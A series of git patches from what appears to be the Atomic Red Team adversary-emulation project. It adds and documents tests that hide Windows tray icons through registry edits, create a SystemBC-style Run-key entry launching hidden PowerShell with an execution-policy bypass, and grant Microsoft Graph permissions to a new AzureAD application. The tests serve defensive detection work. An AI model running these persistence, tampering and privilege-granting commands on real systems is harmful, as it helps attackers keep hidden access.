+ +## Atomic Test #28 - Windows HideSCANetwork Group Policy Feature +Modify the registry of the currently logged in user using reg.exe via cmd console to remove the networking icon Group Policy. +Take note that some Group Policy changes might require a restart to take effect. +See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 3e757ce7-eca0-411a-9583-1c33b8508d52 + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #29 - Windows HideSCAPower Group Policy Feature +Modify the registry of the currently logged in user using reg.exe via cmd console to remove the battery icon Group Policy. +Take note that some Group Policy changes might require a restart to take effect. +See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 8d85a5d8-702f-436f-bc78-fcd9119496fc + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #30 - Windows HideSCAVolume Group Policy Feature +Modify the registry of the currently logged in user using reg.exe via cmd console to remove the volume icon Group Policy. +Take note that some Group Policy changes might require a restart to take effect.. +See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 7f037590-b4c6-4f13-b3cc-e424c5ab8ade + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /f >nul 2>&1 +``` + + + + +
From 08dd613bb00fe95cefa3c897dbfedfe1f680f39a Mon Sep 17 00:00:00 2001 From: CyberBilly7 <91810178+CyberBilly7@users.noreply.github.com> Date: Tue, 15 Mar 2022 22:52:20 -0500 Subject: [PATCH 56/83] systembc (#1814) Co-authored-by: Chase James --- atomics/T1547.001/T1547.001.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml index 3c41bed1..c2475081 100644 --- a/atomics/T1547.001/T1547.001.yaml +++ b/atomics/T1547.001/T1547.001.yaml @@ -151,3 +151,27 @@ atomic_tests: command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f name: command_prompt + +- name: SystemBC Malware-as-a-Service Registry + description: | + This Atomic will create a registry key called socks5_powershell for persistance access + https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c + supported_platforms: + - windows + input_arguments: + reg_key_value: + description: Thing to Run + type: Path + default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File + reg_key_path: + description: Path to registry key to update + type: Path + default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run + executor: + command: | + $RunKey = "#{reg_key_path}" + Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}" + cleanup_command: | + Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" -Force -ErrorAction Ignore + name: powershell + From 37f0539284c8c6d2a5eab913fe17be948f6bcd3b Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 16 Mar 2022 03:52:52 +0000 Subject: [PATCH 57/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1547.001/T1547.001.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) 
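Review bot: The new `cleanup_command` passes `-Path #{reg_key_path}` unquoted, while the attack command wraps the same argument in quotes (`$RunKey = "#{reg_key_path}"`); for consistency and to survive a path containing spaces it should read `Remove-ItemProperty -Path "#{reg_key_path}" -Name "socks5_powershell" -Force -ErrorAction Ignore`. The `reg_key_value` argument is declared `type: Path` but its default is a command line ending in a dangling `-File` with no script path, so `type: String` fits better, and the description `Thing to Run` should say what the value represents, e.g. `Command line written to the Run value (the default mimics the referenced SystemBC launcher and deliberately names no script)`. The description also misspells `persistance`. Because `Set-ItemProperty` creates the value when it does not exist, a note that the test leaves a Run-key entry behind if cleanup is not executed would help operators verify their environment afterwards.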
diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml index c2475081..d5d1c5ef 100644 --- a/atomics/T1547.001/T1547.001.yaml +++ b/atomics/T1547.001/T1547.001.yaml @@ -153,6 +153,7 @@ atomic_tests: name: command_prompt - name: SystemBC Malware-as-a-Service Registry + auto_generated_guid: 9dc7767b-30c1-4cc4-b999-50cab5e27891 description: | This Atomic will create a registry key called socks5_powershell for persistance access https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index fb1c1628..a7f1b71c 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -927,3 +927,4 @@ a4637291-40b1-4a96-8c82-b28f1d73e54e 3e757ce7-eca0-411a-9583-1c33b8508d52 8d85a5d8-702f-436f-bc78-fcd9119496fc 7f037590-b4c6-4f13-b3cc-e424c5ab8ade +9dc7767b-30c1-4cc4-b999-50cab5e27891 From 20df4c72622701af34ee407dea8215177659f72c Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 16 Mar 2022 03:52:57 +0000 Subject: [PATCH 58/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 50 +++++++++++++++++++ atomics/T1547.001/T1547.001.md | 42 ++++++++++++++++ 6 files changed, 100 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index d9dd67a6..d812889d 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -241,6 +241,7 @@ privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious j privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt 
@@ -724,6 +725,7 @@ persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file r persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell persistence,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt +persistence,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 5878040a..3c78d0fd 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -162,6 +162,7 @@ privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious j privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt 
@@ -493,6 +494,7 @@ persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file r persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell persistence,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt +persistence,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 10082dba..9c2ac914 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -407,6 +407,7 @@ - Atomic Test #6: Suspicious bat file run from startup Folder [windows] - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] - Atomic Test #8: Add persistance via Recycle bin [windows] + - Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows] - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - Atomic Test #1: Scheduled Task Startup Script [windows] 
@@ -1159,6 +1160,7 @@ - Atomic Test #6: Suspicious bat file run from startup Folder [windows] - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] - Atomic Test #8: Add persistance via Recycle bin [windows] + - Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows] - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) - Atomic Test #1: Modify SSH Authorized Keys [macos, linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 78c1737f..777a40d0 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -294,6 +294,7 @@ - Atomic Test #6: Suspicious bat file run from startup Folder [windows] - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] - Atomic Test #8: Add persistance via Recycle bin [windows] + - Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows] - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - Atomic Test #1: Scheduled Task Startup Script [windows] @@ -823,6 +824,7 @@ - Atomic Test #6: Suspicious bat file run from startup Folder [windows] - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] - Atomic Test #8: Add persistance via Recycle bin [windows] + - Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows] - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - Atomic Test #1: Scheduled Task Startup Script [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 6074038f..bd91439f 100644 
--- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -18231,6 +18231,31 @@ privilege-escalation: cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f name: command_prompt + - name: SystemBC Malware-as-a-Service Registry + auto_generated_guid: 9dc7767b-30c1-4cc4-b999-50cab5e27891 + description: | + This Atomic will create a registry key called socks5_powershell for persistance access + https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c + supported_platforms: + - windows + input_arguments: + reg_key_value: + description: Thing to Run + type: Path + default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File + reg_key_path: + description: Path to registry key to update + type: Path + default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run + executor: + command: | + $RunKey = "#{reg_key_path}" + Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}" + cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" + -Force -ErrorAction Ignore + +' + name: powershell T1134.005: technique: external_references: 
@@ -49404,6 +49429,31 @@ persistence: cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f name: command_prompt + - name: SystemBC Malware-as-a-Service Registry + auto_generated_guid: 9dc7767b-30c1-4cc4-b999-50cab5e27891 + description: | + This Atomic will create a registry key called socks5_powershell for persistance access + https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c + supported_platforms: + - windows + input_arguments: + reg_key_value: + description: Thing to Run + type: Path + default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File + reg_key_path: + description: Path to registry key to update + type: Path + default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run + executor: + command: | + $RunKey = "#{reg_key_path}" + Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}" + cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" + -Force -ErrorAction Ignore + +' + name: powershell T1505.001: technique: external_references: diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md index 0d2a7137..f2704fe9 100644 --- a/atomics/T1547.001/T1547.001.md +++ b/atomics/T1547.001/T1547.001.md @@ -58,6 +58,8 @@ Adversaries can use these configuration locations to execute malware, such as re - [Atomic Test #8 - Add persistance via Recycle bin](#atomic-test-8---add-persistance-via-recycle-bin) +- [Atomic Test #9 - SystemBC Malware-as-a-Service Registry](#atomic-test-9---systembc-malware-as-a-service-registry) +
@@ -361,4 +363,44 @@ reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f +
+
+ +## Atomic Test #9 - SystemBC Malware-as-a-Service Registry +This Atomic will create a registry key called socks5_powershell for persistance access +https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 9dc7767b-30c1-4cc4-b999-50cab5e27891 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| reg_key_value | Thing to Run | Path | powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File| +| reg_key_path | Path to registry key to update | Path | HKCU:\Software\Microsoft\Windows\CurrentVersion\Run| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$RunKey = "#{reg_key_path}" +Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}" +``` + +#### Cleanup Commands: +```powershell +Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" -Force -ErrorAction Ignore +``` + + + + +
From 1fd5dc6a511fb3bd275e93b85746f71a3760b5c7 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 16 Mar 2022 19:30:25 +0000 Subject: [PATCH 59/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1098/T1098.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml index d1bfd288..37c597a7 100644 --- a/atomics/T1098/T1098.yaml +++ b/atomics/T1098/T1098.yaml @@ -417,6 +417,7 @@ atomic_tests: elevation_required: false - name: AzureAD - adding permission to application + auto_generated_guid: 94ea9cc3-81f9-4111-8dde-3fb54f36af4b description: | The adversarie want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor. You can use Get-AzureADApplication instead New-AzureADServicePrincipal to use an existing application. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index a7f1b71c..acd113e5 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -928,3 +928,4 @@ a4637291-40b1-4a96-8c82-b28f1d73e54e 8d85a5d8-702f-436f-bc78-fcd9119496fc 7f037590-b4c6-4f13-b3cc-e424c5ab8ade 9dc7767b-30c1-4cc4-b999-50cab5e27891 +94ea9cc3-81f9-4111-8dde-3fb54f36af4b From 3906be5325a380b9508da810240d94ce728fc8ea Mon Sep 17 00:00:00 2001 
From: CircleCI Atomic Red Team doc generator Date: Wed, 16 Mar 2022 19:30:30 +0000 Subject: [PATCH 60/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/linux-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/linux-index.md | 1 + atomics/Indexes/index.yaml | 82 +++ atomics/T1098/T1098.md | 659 ++++++++++++++++++ 6 files changed, 745 insertions(+) create mode 100644 atomics/T1098/T1098.md diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index d812889d..31890b17 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -643,6 +643,7 @@ persistence,T1098,Account Manipulation,4,Azure - adding user to Azure AD role,0e persistence,T1098,Account Manipulation,5,Azure - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell +persistence,T1098,Account Manipulation,8,AzureAD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell persistence,T1137.006,Add-ins,1,Code Executed Via Excel Add-in File (Xll),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index 649d2159..307e5c73 100644 
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -208,6 +208,7 @@ persistence,T1098,Account Manipulation,4,Azure - adding user to Azure AD role,0e persistence,T1098,Account Manipulation,5,Azure - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell +persistence,T1098,Account Manipulation,8,AzureAD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 9c2ac914..9666ef5b 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -998,6 +998,7 @@ - Atomic Test #5: Azure - adding service principal to Azure AD role [azure-ad] - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure] - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure] + - Atomic Test #8: AzureAD - adding permission to application [azure-ad] - T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1137.006 Add-ins](../../T1137.006/T1137.006.md) diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 133abe9d..458794af 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -464,6 +464,7 @@ - Atomic Test #5: Azure - adding service principal to Azure AD role [azure-ad] - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure] - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure] + - Atomic Test #8: AzureAD - adding permission to application [azure-ad] - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1137.006 Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index bd91439f..8754ec81 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -41683,6 +41683,88 @@ persistence: $($subscriptions.Name)\"\n" name: powershell elevation_required: false + - name: AzureAD - adding permission to application + auto_generated_guid: 94ea9cc3-81f9-4111-8dde-3fb54f36af4b + description: | + The adversarie want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor. + You can use Get-AzureADApplication instead New-AzureADServicePrincipal to use an existing application. + The DirectoryRecommendations.Read.All permissions have been selected as the default + + The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD. + + Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs. + You can also take a look at the materials: + https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/ + https://github.com/reprise99/Sentinel-Queries + https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766 + https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb + supported_platforms: + - azure-ad + input_arguments: + username: + description: Azure AD username + type: String + default: jonh@contoso.com + password: + description: Azure AD password + type: String + default: p4sswd + application_name: + description: Name of the targed application + type: String + default: test_app + application_permission: + description: Permission from Microsoft Graph Resource API that will be add + to application + type: String + default: DirectoryRecommendations.Read.All + dependencies: + - description: 'AzureAD module must be installed. 
+ +' + prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) + {exit 0} else {exit 1}} catch {exit 1} + +' + get_prereq_command: 'Install-Module -Name AzureAD -Force + +' + executor: + command: "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String + \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName + System.Management.Automation.PSCredential -ArgumentList \"#{username}\", + $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication + -DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal + -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication + | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\n\n#Get Service + Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal + -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize + RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess + = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId + = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set + Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission + = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess + = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type + = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app + permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host + \"App permission $permission not found in the Graph Resource API\" -ForegroundColor + Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object + 
System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set + permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId + -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = + Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment + -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId + -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n" + cleanup_command: | + Import-Module -Name AzureAD + $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + Connect-AzureAD -Credential $Credential + + $aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"} + Remove-AzureADApplication -ObjectId $aadApplication.ObjectId + name: powershell + elevation_required: false T1547.014: technique: external_references: diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md new file mode 100644 index 00000000..e51e06c2 --- /dev/null +++ b/atomics/T1098/T1098.md @@ -0,0 +1,659 @@ +# T1098 - Account Manipulation +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1098) +
